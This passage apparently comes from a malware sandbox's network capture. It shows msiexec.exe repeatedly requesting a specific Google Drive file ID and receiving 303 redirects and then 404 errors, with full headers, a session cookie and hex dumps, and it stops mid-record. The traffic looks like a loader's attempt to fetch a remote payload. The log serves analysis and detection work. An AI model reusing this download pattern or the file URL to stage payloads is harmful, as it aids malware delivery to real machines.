                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:13 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: script-src 'nonce-0yo4dHZnvQzCNKtoNc-idQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 57 73 67 48 34 4d 4c 4c 54 45 74 74 66 46 30 52 47 43 35 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HWsgH4MLLTEttfF0RGC5hw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  46192.168.2.550022142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:14 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:14 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:14 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Axt4E4Sqysd59xPr5LtatQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  47192.168.2.550023142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:15 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:15 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgQZ6LPwJakbmMinfFdW2QRaCEixe4bs45r_8ku9enx8TZIKK1Yhu3ThCNBCukRZ79R-fo22TaM
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:15 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-8I-59FeD5eKDnjMdeWxJWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 33 48 4e 62 76 5a 62 30 50 47 5a 63 30 69 4e 4f 68 56 6a 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="B3HNbvZb0PGZc0iNOhVj8g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  48192.168.2.550024142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:16 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:16 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:16 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: script-src 'nonce-k8R4lhstFvSOmxZWY3KQtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  49192.168.2.550025142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:17 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:17 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC70_4k-dDXqvwrtCcAsEeyhoJn2tmg-sIqHOP5SJuce8Ote-VORupv3SoWJVjERqNOKd9Y-cKY
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:17 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-7bFvBGcDldPWi-3ykgX-Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 4a 4e 4b 63 75 71 63 72 71 50 63 53 6a 41 77 49 7a 67 43 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pJNKcuqcrqPcSjAwIzgCiA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  50192.168.2.550026142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:18 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:19 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:19 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-qgj6rWkR_APfqswCKJbbEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  51192.168.2.550027142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:19 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:20 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgRWJDCPEBYHmPQZi1fSrhBOf-fh3LW4VeYHo902LxVVIvB_0TD3J_3HRTi7iQ9Gd-GzA_uv7r8
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:20 GMT
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-n2Ibup2iGqG6vbuNSs6yuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 4a 44 33 48 7a 67 39 47 61 66 42 4c 4b 36 66 42 30 52 47 59 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uJD3Hzg9GafBLK6fB0RGYQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  52192.168.2.550028142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:21 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:21 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:21 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Ey0w7RFLW_AfkzgKEqsSmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
